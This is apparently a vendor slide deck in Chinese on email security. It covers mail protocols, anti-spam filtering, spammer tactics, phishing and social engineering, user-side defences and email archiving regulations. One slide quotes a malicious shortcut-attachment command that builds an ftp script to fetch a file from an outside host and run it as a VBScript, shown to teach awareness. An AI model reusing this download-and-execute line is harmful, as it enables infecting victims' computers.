電子郵件安全 董一中 Leo Dong 產品經理 中華數位科技股份有限公司 leo@softnext-inc.com

Agenda 個人&公司簡介 電子郵件安全的技術 Spammer發送手法與郵件運作 電子郵件社交工程 郵件稽徵與歸檔 Q & A

個人簡介 董一中 (Leo Dong) 淡江大學德國語文學系畢(1999年) 中壢資策會網路工程師養成班第卅五期結業(2002年) 曾任職於精誠資訊股份有限公司資安部門產品行銷專員(2002~2004) 經手之代理產品： CA eTrust IDS, Check Point, eLock, Foundstone, Intrusion Inc., Rainfinity, Stonesoft, Websense… 2003/07~2004/10派駐於中國上海，負責大中華區資安事業推廣 現任職於中華數位科技股份有限公司第一事業群產品經理(2002~迄今) 負責SPAM SQR, Lumension, SmartIT, TotalFileGuard等產品 3

公司簡介 中華數位科技秉持【We Secure Your Content】為服務理念，從email維運服務出發，到客戶整體內容安全保護。Softnext產品已導入1,700多家以上兩岸知名廠商 ，擁有領先的企業導入經驗及完善的技術支援能力 設立時間 2000年8月 資本額 新台幣5000萬元 網址 www.softnext-inc.com 員工數 總計86人 (台灣66人,海外20人) 銷售區域 台灣,中國,日本,東南亞,歐洲等 研發產品 SPAM SQR Mail SQR Expert Mail Archiving Expert Content SQR

Agenda 個人&公司簡介 電子郵件安全的技術 Spammer發送手法與郵件運作 電子郵件社交工程 郵件歸檔市場分析 Q & A

如何發送一封電子郵件 確認寄/收件人郵件網域 交涉(Negotiation) ESMTP的 處理程式 用戶身份認證 郵件本文的傳送 郵件傳送 交涉(Negotiation) 郵件本文的傳送 結束告知 Mail Server Client DNS Server 確認寄/收件人郵件網域 用戶身份認證

Email的組成 郵件表頭(Mail Header) 郵件主體(Mail Body)

Email詳細資料

Email的運作 MUA(Mail User Agent) MTA(Mail Transfer Agent) MDA(Mail Delivery Agent) MUA POP3 SMTP MTA MTA SMTP POP3 MUA

SMTP Protocol Step1 Step2 Step3 Step4 您好 您好 MTA MTA 我有信要寄過去 可以,有哪些信? 有這些信… MTA Step3 好,收到了 MTA 謝謝,再見 Step4 MTA 再見

DNS設定 Domain Name Record Data mail.softnext.com.tw A 192.168.1.254 MX 5 spam.softnext.com.tw softnext.com.tw MX 10 mail.softnext.com.tw spam.softnext.com.tw A 192.168.1.253

連線時的檢查 寄送一封E-Mail時，首要先進行連線，而一般連線時所能獲得的資料包括了： 送信來源IP及所宣稱之域名 DNS查詢之資料 其所宣稱的寄件者、收件者之E-Mail Address 連線的頻率及瞬間連線數量

連線層時利用的判斷技術 黑、白名單 瞬間連線數限制 一定時間內，郵件發送量限制 根據來源之DNS正解、反解是否存在協助判斷 外部資料庫引用： RBL(Realtime Black-List) DomainKeys SPF Sender-ID 外部資料庫引用： Razor─主要的功能為取比對郵件中不當字詞、垃圾郵件字詞隨機取樣、編\解碼判斷、防誤判（false positives）、附件檔案分析及多引擎判斷，再配合多方搜集垃圾郵件特徵回報資料，可建立即時更新的指紋資料庫。 DCC（Distributed Checksum Clearinghouse）─它的理念在於強調，用戶應收取他們願意收的郵件，以「白名單」的觀念，透過多個用戶回報收到的電子郵件加密程式碼（或稱分數）。DCC伺服器及用戶端不停的相互更新回報，對於進來的郵件會在郵件檔頭（Header）的部份標上一個累加回報總分數，當進來的郵件不符合DCC白名單資料庫並且超過限定的分數，就會被丟棄或拒收。 Pyzor─與Razor相同，但它是開放原始碼的軟體，使用者可自行架設獨立的資料庫。 SPF、Domain Keys及Sender ID等認證防偽方法： SPF（Sender Permitted From）─一般的MX Record所儲存的是這個網域有哪些合法的郵件伺服器，而SPF則可以讓網域管理者對外公布哪個IP位址才是該網域合法的寄件伺服器。當收到一封新信件時，郵件伺服器先至DNS查詢SPF記錄，以確定該信件是否真的由信件中所宣稱的域名寄出，若不是，則很可能是假冒的。目前已有數千個網域公布了這項記錄。但若有個合法的Domain並一樣透過SPF流程對外公布某個IP位址才是發信的，只能確定沒有偽造來源，但卻還是能發送垃圾郵件。s Domain Keys─網域管理者先產生一對公鑰放在DNS伺服器上，用來驗證郵件的網域，而私鑰放在郵件伺服器上，所有由該郵件伺服器寄出的電子郵件都加以簽章。寄出信件時，合法的使用者所寄出的信會被郵件伺服器以私鑰簽章，附在信件上。當收件者的郵件伺服器收到時，會先從信上所宣稱的網域的DNS伺服器取得公鑰並驗證簽章，確定信件的確是從該網域所寄出而非偽造的。這樣的做法可用以避免許多垃圾郵件常偽造網域的特性，但如果是真的從該網域發出的垃圾郵件就沒辦法了，所以對於有Open Relay問題的郵件主機，這個方法一樣無法阻絕垃圾郵件來犯，且目前有採Domain Keys認證的主機不多，所以大多數的電子郵件伺服器還是得接收沒有Domain Keys認證的電子郵件。 Sender ID─其基本原理與SPF是一樣的，由微軟所公布。 13

連線層過濾運作示意圖 來源及IP檢查 寄件者檢查及 寄件者身份認證 驗證收件者是否存在 寄件電子郵件主機 目標電子郵件主機

垃圾郵件內容辨識技術 固定的條件：如果垃圾郵件很單純，且有固定的規則或條件可循，如：固定某個寄件者、同種主旨、信件內容的固定的某段字、同個IP來源，甚至是交叉的條件，如：某主旨跟IP同時成立的話等，就可設定固定的過濾方法加以攔阻。進階的運用，也可搭配正規表示法（Regular Express）阻絕規則可被類推的垃圾郵件，如：垃圾郵件的主旨為re:[1]、re:[2]……..re:[112]….。

垃圾郵件內容辨識技術 貝氏演算法：貝氏演算法通常搭配一定量的中性規則，並投入垃圾郵件及非垃圾郵件，分別交予貝氏演算法進行「訓練」，並產生適當的機率規則自動分辨出垃圾郵件與正常郵件！只要投入分析的郵件量越大，且越逼近現況，貝氏演算法的準確度就越高。但貝氏演算法所整理出的資料庫並非一通用法則，而是僅適合「當下及當時的環境」，為確保它的攔截精確度，例行性的訓練是不可或缺的。

垃圾郵件內容辨識技術 內容過濾技術：透過掃描垃圾郵件的一些關鍵字詞、所夾帶URL、Header特性…等方式，與包含這些特徵的資料庫進行比對，藉此判斷出垃圾郵件的可能性，為內容過濾方法的應用。若希望提升對垃圾郵件的判斷能力，則除了比對之特徵資料庫需定時更新外，比對引擎的速度及取詞斷字的方法也是一項關鍵因素。

電子郵件威脅 垃圾郵件(Spam) Web-based Email 使用問題 病毒/木馬/惡意程式 Mail Bomb 社交工程 & Phishing

電子郵件安全技術架構示意圖 電子郵件 加密 (TLS, PGP) 內容過濾防護技術 連線過濾防護技術 雞尾酒型防護技術 運作 原理 Internet Firewall Mail Server Client Inbound Outbound 夾帶病毒/惡意程式威脅 社交工程威脅 垃圾郵件 郵件炸彈 Web-based Email 使用威脅 電子郵件 加密 (TLS, PGP) 黑名單 DoS防禦 Real-Time Black List SPF Sender ID DomainKeys 固定的條件過濾 貝氏過濾法 內容關鍵字過濾 外部資料庫引用 內容過濾防護技術 連線過濾防護技術 雞尾酒型防護技術 運作 原理 送信: 收信: SMTP ESMTP POP3 IMAP4 弱點 電子郵件明文傳送, 內容易被偽冒篡改 安 全 技 術 部署 原則 個人端 部署原則 閘道式( Gateway Mode) 側錄式(Sniffer Mode) 橋接式(Bridge Mode)

Anti-spam技術比較表 連線過濾 防護技術 內容過濾 雞尾酒型 其他發展 趨勢 定 義 根據連線時收發一封Email所提供的訊息，來進行驗證及特徵判斷等分析。 針對Email的Envelope、Header、Body，來進行內容分析與檢查比對。 是混合多重的技術，分次分層或是同時搭配進行判斷及過濾。 新發展多類可信賴的寄件來源的驗證檢查技術，以查證寄件人的身分。 技 術 項 目 來源檢查與驗證、IP或網域黑名單過濾… 貝氏過濾、內容關鍵字過濾、引用外部資料庫過濾… 統稱為雞尾酒式過濾技術 SPF、DomainKeys、Sender ID… 適 用 範 圍 防範DoS阻絕服務或惡意攻擊來源。 適用於特定條件的郵件內容過濾，與垃圾郵件、惡意郵件內容之防範過濾。 常用於垃圾郵件之防護過濾。 運用於垃圾郵件之防護過濾。

Agenda 個人&公司簡介 電子郵件安全的技術 Spammer發送手法與郵件運作 電子郵件社交工程 郵件歸檔市場分析 Q & A

什麼是垃圾郵件？ 垃圾郵件的定義： 未經允許大量寄送造成收信者困擾的郵件。 垃圾郵件的目的： 最原始常見的目的多半為商業行銷。 垃圾郵件與eDM： eDM應是收件者願意閱讀並不 會造成困擾的郵件。通常具 opt-in及opt –out機制

垃圾郵件緣起 1994年4月12日，一對居住在美國亞利桑那，專門承接移民事務的律師夫婦寫了一段Perl腳本的小程式，將他們的移民顧問服務廣告的電子郵件發送給大約6000個Usenet新聞群組用戶。這一事件即為垃圾郵件的起源，被稱為“綠卡”事件。（賽迪網） 垃圾郵件又稱為Spam（原意為肉罐頭），因為是從英國的Monty Python喜劇影集而來，有一幕為餐廳服務生唸菜單，全部都是跟Spam有關的菜色，因而被引用為討人厭的名詞。

垃圾郵件有何特性？ 大量發送 難以追蹤偵測 難辨真假 安全漏洞 主觀性 垃圾郵件最初以商業目的，為求效率常大量發送，亂槍打鳥。 為避免法律或相關責任，不論就信件內容亦或來源都常有偽造痕跡。 難辨真假 為吸引閱讀或是躲避內容過濾，部份垃圾信內容與正常信幾近無異。 安全漏洞 垃圾郵件可夾帶惡意的程式，隨收信軟體及安全措施而有不同安全威脅。 主觀性 每個人目的性不同，是否認可為垃圾郵件的灰色地帶大。

為什麼要發垃圾郵件？ 商業目的（類似EDM） 不合法商品（盜版、色情光碟、處方藥、毒品…等） 詐騙郵件（Phshing or Fraud） 試探性郵件（搜集帳號、試發、假回報。） 病毒郵件 製造輿論效果（黑函、假的金融消息…等）

垃圾郵件帶來的災害 流量的問題（Mail Server負載加重、網路頻寬壅塞、郵件儲存空間爆滿。） 耗費收件人的精神及時間 病毒帶來的資安風險 詐騙郵件減低對電子商務的信心（金融方面的詐騙比例最高） Anti-Spam的工作帶來額外的費用支出 帶動其它管道的Spam氾濫情形

垃圾郵件數量成長趨勢 根據Radicati group預估調查，到2009年全球垃圾信已佔整體Email流量的80% [單位--十億封] 27

2009年垃圾郵件來源統計（一）

2009年垃圾郵件來源統計（二）

2009年垃圾郵件來源統計（三）

垃圾郵件與一般郵件的差異 但是，只要SPAMMER願意，這些差異都可被精巧的偽裝避過 垃圾郵件可能沒有固定的發送郵件伺服器 垃圾郵件可能沒有合法的域名或MX記錄 正常郵件不太可能跨公司一信多發 垃圾郵件一定帶有需要被宣傳的特定內容或關鍵字句 垃圾郵件發送時，很有可能在發送時洩露考慮不週的痕跡，如Header的資訊，或是envelope出現不合理的情況。 但是，只要SPAMMER願意，這些差異都可被精巧的偽裝避過

垃圾郵件的發送 為了能成功的發送垃圾郵件，SPAMMER必須要注意下 列細節： 避免來源被追蹤 避免內容被偵測 發送有效率 要想辦法知道發送後的效益 社交工程

早期垃圾郵件的發送 租用線路自行架設伺服器 設定不當郵件伺服器 申請免費電子信箱 SPAM

近期垃圾郵件的發送 升級後的殭屍電腦 殭屍電腦 SPAM

垃圾信對企業信箱的攻擊模式 郵件炸彈發送模式 垃圾信業者一次發送大量的郵件，造成頻寬擁塞 連線服務中斷甚至Mail Server當機。 收不完的SPAM Mail \ _ / SPAM Mail Spammer Internet 正常郵件 Mail Server 主機當機 Mail無法收送 / _ \

垃圾信對企業信箱的攻擊模式 字典檔發送模式 透過字典檔以一封信夾帶多位收信人帳號，寄到企業的郵件伺服器。對郵件伺服器造成 系統負荷：Mail Server要核對收信帳號，再一一對內寄送 對內部不存在帳號，需對外發出user unknown系統訊息 Spam Mail Internet Spammer User unknown IP不存在

退信攻擊（一） 郵件伺服器A 郵件伺服器B B1 B2 B3 B4 A1 A2 A3 A4 冒充B1、B2…Bn，送信給A1、A2…An 退信 當SPAMMER冒充B1、B2…Bn，送信給A1、A2…An，若A1、A2…An真實存在，則SPAM會被成功寄送；若有任一收信者不存在，則會發生退信，並由郵件伺服器A退給遭到冒充的B1、B2…Bn。

退信攻擊（二） 當SPAMMER冒充B1、B2…Bn，送信給自行架設的郵件伺服器A1、A2…An ，則會發生退信，並由自行架設的郵件伺服器A1、A2…An退給遭到冒充的B1、B2…Bn。

退信攻擊（三） 郵件伺服器A A1 A2 A3 A4 冒充不存在的寄件者，送信給A1、A2…An 無法退信 產生大量信件佇列 冒充不存在的寄件者，送信給A1、A2…An，則會發生無法退信，郵件伺服器A會定時嘗試退信，並開始累積越來越多郵件佇列，造成郵件伺服器A效能低落。

近期Spammer與駭客合作模式 結合病毒感染,產生殭屍電腦發送站 運用電子郵件邏輯漏洞 破解網頁郵件的註冊驗證模式(Gmail, Hotmail, Yahoo..),偽裝合法網頁郵件發送spam To be Continue…

避免來源被追蹤 使用動態IP，自行架設SMTP Server進行垃圾郵件發送 租用網路管理較寬鬆國家的IP或網路進行垃圾郵件發送 透過設定不當的郵件伺服器進行垃圾郵件發送 透過遭受到入侵的殭屍電腦進行垃圾郵件發送 申請免費信箱發送垃圾郵件（如yahoo、hotmail） 透過公用賀卡或新聞發送系統發送垃圾郵件 1、根據以色列Commtouch公司在2006年12月公布的研究報告中指出，目前殭屍電腦的數量已經高達800萬，這些受控制的殭屍電腦群，可在短短的數小時內，派發出百萬封以上的垃圾郵件，前述所提及的圖片內嵌式垃圾郵件，更為全球帶來每天超過1.7TB的流量，殭屍電腦的威力實不可小覷。 41

利用Yahoo賀卡 發送系統派送垃圾郵件。

賀卡通知夾帶釣魚郵件 威脅解析 偽裝好友寄 來賀卡取信通知Email 3. 企圖感染 受害電腦 2. 點連結網址, 誤入陷阱 @ 成為垃圾信發送跳板 偽裝好友寄 來賀卡取信通知Email 下載木馬/惡意程式 3. 企圖感染 受害電腦 竊取帳號/資料 2. 點連結網址, 誤入陷阱

避免內容被偵測 避免使用明顯關鍵字 利用iFrame的方法，將垃圾郵件的內容導引至外部網頁 混雜入其他合法或不相關字眼 利用文字排版或圖片混雜等方式，錯亂內容掃描偵測 圖片式垃圾郵件

無行銷字眼，只是一篇 吳淡如的文章，然後要 你打電話才進行推銷！

無明顯關鍵字，並 混入不相關字眼，根據信末的宣傳語，很可能是透過免費信箱發送的垃圾郵件。

文字及內容混排

搭配HTML語法，造 成錯位排版。(視覺 上正確，但進行字串 掃瞄時會發生問題。)

圖片式垃圾郵件的災害 穿透力更高，不容易偵測。 數量約佔全體垃圾郵件的一半以上。 容易塞爆信箱 影響Push Mail的使用

圖片式垃圾郵件的一些範例

發送效率 垃圾郵件多半為程式化寄送（較手動發送有效率） 垃圾郵件發送的效率還包括了是否能成功送達，因此垃 圾郵件發送程式必須能： 發送程式發送後的垃圾郵件不可有破綻 分散輪發式 病毒式發送 不容易被追蹤 內容或格式多變 回饋資料（開信率、搜集有效帳號…等）

垃圾郵件發送效益 收件者回信、回電(或要求讀取回條) 垃圾郵件中的超連結點擊率 垃圾郵件發送後，沒有收到退信的情況 利用HTML圖片連結，暗中製造點擊數

同時利用iFrame及HTML 圖片連結，暗中製造點擊 數。

生活中的案例-Phishing email (Phishing) http://www.securecitibank.us

釣魚、詐騙事件逐漸增多 根據美國聯邦調查局及反網路釣魚工作小組（APWG）的調查統計，在美國網路釣魚詐騙的損失金額，從2001年的1,700萬美元，2002年的5,400萬美元，到了2003年，銀行與消費者的直接損失高達24億美元，而今年的統計數字還會持續增長。根據警政署統計，網路釣魚案件以每年五倍的速度成長，這還是有備案的數據，實際上數字還要更高。 警政署科技犯罪防治中心發現，從2006年12月開始，臺灣犯罪集團雇用中國大陸駭客，陸續架設、偽造臺灣知名企業的網站，包含10家假的網路銀行、2家航空公司、4家電腦科技公司、4家旅行社、1家人力銀行以及多個理財網站，總數超過50個。這些釣魚網站都申請註冊和原始正牌網站相似度極高的網路名稱，例如小寫的英文字母l與數字1，或者小寫的h和n等相似符號，駭客偽造這些企業網站的目的，主要是希望藉此取得金錢。 Yahoo!奇摩的買家近來陸續反映，收到假賣家提供的「假頁面」。頁面直接從Yahoo!奇摩網拍頁面複製而來，不同之處只在網域名稱。

Phishing Email 範例 雅虎拍賣上的結標信(台灣常見詐騙郵件的一種)

含有惡意指令的捷徑附件（一） %windir%\system32\cmd.exe /c echo set a=echo re>a.bat&echo %a%cv pnf pnf.vbs^>la>>a.bat&call a.bat&echo bye>>la&echo o>l&echo web.g03z.com>>l&echo aa33>>l&echo bb33>>l&type la>>l&ftp -s:l&start pnf.vbs&del la&del l a.bat 57

含有惡意指令的捷徑附件（二） 1.先種植 2.再發動 58

攻擊應用程式的附件（一） 59

攻擊應用程式的附件（二） 60

來自各國各有特色的垃圾郵件

個人能做的防範－基本的資安條件 使用正版軟體，定時修補已知作業系統漏洞 防毒軟體很重要 不要使用不明來源的軟體 不要瀏覽色情、賭博、不合法藥品、光碟販賣網站 收到可疑的Email通知，請不要直接由Email中所敘述的訊息回覆。 多利用ISP或其他免費提供的Anti-SPAM工具

個人能做的防範 不隨便外留Email Address 不隨便點垃圾郵件上的超連結 收件軟體應該做好正確設定 使用WebMail應該當心 多使用收信軟體、Webmail、及各種個人用，且能防範SPAM的機制或功能。

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 使用Webmail的話，不要去讀取垃圾郵件

Agenda 個人&公司簡介 電子郵件安全的技術 Spammer發送手法與郵件運作 電子郵件社交工程 郵件歸檔市場分析 Q & A

社交工程 社交工程，英文為Social Engineering，是指以影響力或說服力來欺騙他人以獲得有用的資訊，這是近年來造成企業或個人極大威脅和損失的駭客攻擊手法。 社交工程利用人性容易相信而上當的弱點，避開了不容易破解的網路防火牆，選擇容易跨越的人性防火牆，只應用了簡單的溝通和欺騙技巧，便突破了企業的安全防護，而突破這些耗資千萬的層層安全防護，所花費的成本竟然只有一、兩通電話的費用。

收發電子郵件的風險－社交工程 社交工程是一種利用人性的弱點及無知，透過欺騙，取得被害人的信任，讓被害人作出對自己有利的舉動 常見的手法莫過於以電話、手機、簡訊等管道，設計騙人的劇本，讓被害人心甘情願的告知個人機密資訊或交付財物 在網路世界裏，最常使用的溝通管道就是電子郵件，因此社交工程和電子郵件的相互結盟，創造了新的詐騙手法 目前這樣的手法已大量被駭客拿來利用，「電子郵件加上社交工程加上木馬/後門程式」，駭客能夠取得的不僅僅是個人資訊，公務機密資料，甚至竊盜網路銀行帳號密碼、私自進行網路轉帳等行為

社交工程攻擊手法 製作釣魚相簿 瀏覽相簿 駭客 控制殭屍電腦/偷竊重要資料… 登入假網頁 3. 變更密碼, 在相簿中植入木馬 4.瀏覽相簿者PC被植入木馬 駭客 控制殭屍電腦/偷竊重要資料… 登入假網頁 2. 帳號密碼被竊 1. 偽造網路相簿寄 維護通知信

社交工程攻擊模式 Phisher 3. 外部駭客監控該電腦使用情形 2. 被植入惡意程式或監控程式 1.開啟附檔或連結網址 5.延伸災害: 機密情報外洩 個人財務損失 被冒名犯罪… 4. 外部駭客偷取該電腦重要資料

社交工程防護技術架構 疑似正常信/合法來源的Phishing mail 只能攔截部分Phishing mail (保證會漏攔) Phisher Internet 垃圾郵件防禦 Mail Server Client !? !? 異常網頁連結 網路傳送檔案 上網行為管控 71

社交工程Email(八卦主旨)

社交工程Email(八卦主旨)

社交工程Email(科技新知)

社交工程Email(影劇新聞)

社交工程Email(情色主旨)

社交工程Email(情色主旨)

社交工程Email(情色主旨)

社交工程Email(休閒娛樂主旨)

社交工程Email(休閒娛樂主旨)

社交工程Email(體育新聞)

社交工程Email(養生保健主旨)

社交工程Email(養生保健主旨)

社交工程Email(工作相關主旨)

社交工程Email(政治主旨)

OO部社交工程演練統計概要 總寄信量：1782封 總收件者：297人 開啟惡意信件：209人(70.3%) 開啟惡意連結：119人(40%)

電子郵件的社交工程 電子郵件社交工程攻擊手法展示 電子郵件社交工程的攻擊類型 假冒寄件者 使用讓人感興趣的主旨與內文 含有惡意程式的附件 利用零時差攻擊

假冒寄件者方式－顯示名稱假冒 王小英 真正的帳號應該是 wang@gov.tw 電子郵件地址根本是錯的 駭客修改 寄件者的顯示名稱為假冒的人 但是實際上卻是從完全不對的帳號寄來的 例如上圖的例子: 寄件者 王小英所使用的電子郵件地址應該是wang@gov.tw 而檢視寄件者的電子郵件地址卻可以發現根本是錯誤的電子郵件地址寄來的 電子郵件地址根本是錯的

假冒寄件者方式－電子郵件帳號假冒 wang@g0v.tw 用數字的零來假冒成英文的O wang@gov.tw vs wang@g0v.tw 入侵者會使用相似的字體來假冒寄件者的電子郵件地址 例如上圖的例子: 寄件者 王小英所使用的電子郵件地址應該是wang@gov.tw 結果駭客利用相似的字用數字的零來假冒成英文的O 申請了一個wang@g0v.tw的電子郵件地址來欺騙收信者 wang@g0v.tw

假冒寄件者方式－完全假冒 使用電子郵件協定的弱點，完全假冒寄件者的名稱以及電子郵件位址；甚至透過入侵寄件者的電腦來寄發電子郵件。 1.入侵要假冒者的電腦 駭客 4.寄發含有惡意程式的電子郵件 收件者 入侵者會使用完全正常的寄件者資料來欺騙使用者 使用的方式可以 1.利用電子郵件協定的弱點，假造電子郵件的封包標頭進而假冒寄件者的名稱以及電子郵件位址 2.駭客透過入侵寄件者的電腦，直接使用寄件者的電腦來寄發電子郵件 寄件者的電腦 3.透過被入侵的電腦寄發電子郵件 2.使用假造的電子郵件封包標頭來假冒寄件者

假冒寄件者方式－電子簽章假冒 駭客申請一個假的電子簽章，加在電子郵件裏，以便欺騙使用者相信該電子郵件的正確性。 紅色小圓圈的數位簽章標誌只是表示該電子郵件被簽章過，但並不保證簽章的正確性。 駭客申請一個假的電子簽章,並對電子郵件進行電子簽章的動作 欺騙使用者來相信該電子郵件的正確性 例如某新聞http://news.chinatimes.com/Chinatimes/newslist/newslist-content/0,3546,110111+112006082200761,00.html …科顧組指出，今後科顧組寄出的任何電子郵件均會進行數位簽章，若是收信者是用 outlook express收信時，應該會在寄件者的前端看到紅色小圓圈的數位簽章標誌，即可確定安全無虞，不過webmail則無法顯示。.. "在寄件者的前端看到紅色小圓圈的數位簽章標誌" 只能說明該電子郵件有被簽章過 但沒有保證是正確的來源（不保證簽章的正確性!!!） 如果使用者只用紅色小圓圈來當成簽章的驗證,駭客只要用隨便的電子簽章來對郵件進行加簽的動作,就可以欺騙使用者

使用令人感興趣的主旨與內文 駭客會使用讓人感興趣的資料消息，來欺騙使用者去開啟這些附件或超連結，造成木馬程式開始動作。

使用令人感興趣的主旨與內文－範例 駭客會使用收信者有興趣的生活、政治、工作、情色等相關議題的主旨，來吸引收信者開啟郵件，例如： 週休二日的最好去處 319槍案調查報告－內幕版 公文09-881234567號 林稚齡爆乳寫真－搶先曝光版

含有惡意程式附件 駭客在電子郵件附帶一個含有惡意程式的檔案，這個檔案不一定是執行檔，可能是各種類型的應用程式，甚至是壓縮檔。駭客會夾帶任何在應用程式上有弱點的文件檔案類型，並想辦法誘騙使用者開啟附件，藉以啟動安裝木馬程式。例如： 含有惡意程式的影片檔（wmv） 含有惡意程式的Office文件（doc） 含有惡意程式的圖檔（jpg） 含有惡意程式的壓縮檔（zip）

利用零時差攻擊 駭客利用尚未被發現的弱點來攻擊使用者，弱點的對象可能是各種類型的應用程式，甚至是收信軟體、網頁瀏覽器軟體。只要使用者開啟了這些含有弱點的程式，就會啟動木馬程式。

何謂「零時差攻擊」？ 安全時期 安全時期 危險時期 只要是軟體即有可能存在弱點。以微軟為例，每年都會發佈上百個弱點，若未能及時修補弱點，即可能讓駭客入侵成功。 軟體弱點在沒有任何修補方式之前，出現相對應的攻擊行為時，此類攻擊稱為「零時差攻擊（Zero-day Attack） 」。 攻擊程式碼出現 安全時期 危險時期 安全時期 弱點被發現 修補程式公告

資安攻擊發生點 無解決的方式，也不知威脅存在（不可預期的風險） 無徹底解決的方式，但可預做準備（可預期的風險） 空窗期（B） (高峰期) 空窗期（A） 修補期 安全期 軟體弱點 被發現 軟體弱點 資訊公佈 軟體弱點修補方式釋出 進行更新修復軟體弱點 弱點資訊公佈，全球駭客隨時可能發展出攻擊程式。

分辨電子郵件的真偽 分析顯示名稱與電子郵件帳號 分析郵件主旨與附件 分析電子簽章 追蹤寄信來源

分析顯示名稱與電子郵件帳號

分析郵件主旨與附件 不開啟任何寄件者沒有事先知會的附件 不開啟與自己無關的附件以及郵件 不開啟沒有電子簽章的郵件(政府單位)

分析電子簽章 分析電子簽章的真偽 點選紅色小圓圈的數位簽章標誌

分析電子簽章 分析電子簽章的真偽 檢查『數位簽署者』欄位的電子郵件是否是正確的寄件者電子郵件地址 點選「檢視憑證」

Windows 與 Office Update 安裝到最新（Auto update） 資料備份與安裝測試

Internet Explorer的安全設定 使用 Windows Update 功能安裝最新的「Internet Explorer 的安全性更新」。 設定 Internet Explorer 的安全性。 各區域的安全性至少要設定在「預設層級」以上。 為了避免組織型駭客透過瀏覽器的弱點進行入侵，所以Internet Explorer也應該留意以下要點。 第一，請使用較新版本的Internet Explorer，最少應該使用IE 6.0 Sp1以上的版本。 第二，安裝所有關於IE有關的安全性更新程式。保持更新程式安裝到最新的狀態。 第三，設定IE程式的安全性，其安全性的等級應該設定在「預設層級」以上。

啟用個人防火牆 安裝或啟用個人防火牆功能來預防後門程式的運行 防火牆設定建議 適當阻擋對外的連接埠Port 阻擋未知的程式由內對外的直接連線要求 指定使用可信任的DNS 伺服器 圖在下一頁

安裝或啟用個人防火牆功能來預防後門程式的運行 適當阻擋對外的Port 阻擋未知的程式由內對外的直接連線要求 指定使用可信任的DNS 伺服器

有效防範社交工程攻擊的方法 （1）認識常見社交工程的可疑徵兆 首先，隨時具備危機意識，惡意人士可能以任何角色或形式出現，在沒有適當的認證情況下，不應輕信他人，只要出現社交工程攻擊警訊，都應保持小心求證的戒心。認識幾個社交工程的可疑徵兆，例如對方強調是緊急事件；提出不尋常的請求；威脅對方如果不照辦會有嚴重的後果；拒絕告知回電號碼…等，遇有上述情形時應提高警覺心。 　 （2）遵守公司安全政策與程序 確認要求者的身分 另外，平時亦應遵守公司安全政策與程序，例如依資料分級制度流通資訊，不開啟來路不明的電子郵件等，在任何資訊釋出時，都要確認要求者的身分及對方經過授權。 　 （3）通報作業 最後，遇到疑似攻擊事件時應向有關單位通報。

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 設定以純文字模式開啟信件

個人能做的防範 設定以純文字模式開啟信件

個人能做的防範 設定以純文字模式開啟信件

個人能做的防範 設定以純文字模式開啟信件

個人能做的防範 設定以純文字模式開啟信件

Agenda 個人&公司簡介 電子郵件安全的技術 Spammer發送手法與郵件運作 電子郵件社交工程 郵件稽徵與歸檔 Q & A

大型企業員工Email管理實態 35%企業懷疑email洩露出機密重要資料 25% outbound郵件帶有財務或法律性的管理風險 118

郵件管理所面臨的需求 公司營運主管： 如何有效進行重要郵件稽核與外流，如：財務報表、研發文件、業務報價單 危機處理的郵件管理與蒐證 主管單位稽核所需文件(金融、政府、上市櫃..) 員工上班郵件使用情形掌握(內部信) 郵件系統管理者： 對於公司郵件管理政策如何有效落實 郵件流量無法管控，員工發送不當郵件，造成公司頻寬浪費與名譽受損 電子郵件病毒的入侵 郵件備份管理，當Mail Server或個人電腦一旦當機或受損重新安裝，電子郵件將可能會有遺失的風險 119

小心！商業間諜 研發資料是公司的極高機密,我們應想辦法防範機密外洩,不然下一個遭殃的受害者可能就是…? 陳總,我手上有你們對手公司的新款研發設計圖,你想看看嗎? 研發資料是公司的極高機密,我們應想辦法防範機密外洩,不然下一個遭殃的受害者可能就是…? 120

Email洩密事件 121

電子郵件稽核解析 業務人員 客戶 1.業務要將報價單 Email給客戶 公司規定: 業務報價單要經 5.客戶收到Email 主管核定後,才能 核准 寄出 4.Email稽核系統寄出該Email並留存紀錄 報 價 單 業務主管 3.主管核可準備寄送Email 122

實施Email歸檔的原因 Email資產保存 用於KM/風險分析 遵循法規 系統設備毀損 Email復原 Email稽核舉證 提高生產力 &工作效率

未導入Email歸檔的儲存管理 等同堆滿雜物的倉庫,頗難翻找到目標Email 目前市場上的備份軟體或是Mail Server所提供的郵件備份功能均是如此

導入Email歸檔的儲存管理 等同一群專業圖書管理員提供有效率的Email歸檔服務

Email歸檔政策制定 Who What Where When How 分權& 存取管理 郵件分類 &備份目標 指定儲存設備 儲存時間設定 帳號分權 Who 分權& 存取管理 部門分權 專案分權 職務分權 What 郵件分類 &備份目標 暫存郵件 重要等級:低 重要等級:中 重要等級:高 Where 指定儲存設備 On-Line Near-Line Off-Line When 儲存時間設定 預設自動執行 手動執行備份 How 彈性管理& 歸檔/還原方式 個人化歸檔服務 稽核舉證 遵循法規 維運調整機制 126

風險管理&遵循法規 要求：情報保護+電子資料保存 企業全球運籌 的經營挑戰 美 國 *沙賓法案 *HIPAA 全球金融 美 國 *沙賓法案 *HIPAA *Sec 17 CFR Part 210 全球金融 *新巴賽爾協定 企業全球運籌 的經營挑戰 日 本 *J-SOX日本沙 賓法案 *個人情報保護法 我 國 *營業秘密法 *電腦處理個人資 料保護法

郵件保存期限 法規遵循 沙賓法案( Sarbanes- Oxley Act of 2002 ) 企業有責任將所有的電子檔案以及電子郵件紀錄，備份保存至少 5 年。 上市企業的所有公共類型業務資料，包括電子郵件在內，必須保存至少5年的時間，特定類型的查核報告資料保存期限7年。 巴賽爾協定Basel II 銀行業者要在2007年前準備至少3年以上的有效風險評估資料、並展示以2年以上歷史資料為基礎而建構的有效風險評估模型 HIPAA( Health Insurance Portability and Accountability Act of 1996 ) 無論是電子郵件或檔案，包括與公司往來合約、與醫療政策及流程相關的文件、與病人溝通的紀錄表格或是消費者抱怨等紀錄，都需保存至少 6 年。此外，所有與病人相關文件最少需保留至病人過世後 2 年。 Sec 17 CFR Part 210 根據美國證券交易委員會規定，與財務報告審核相關的工作資料以及檔案都需保存 7 年以上。 研發或特定資料永久保存 128

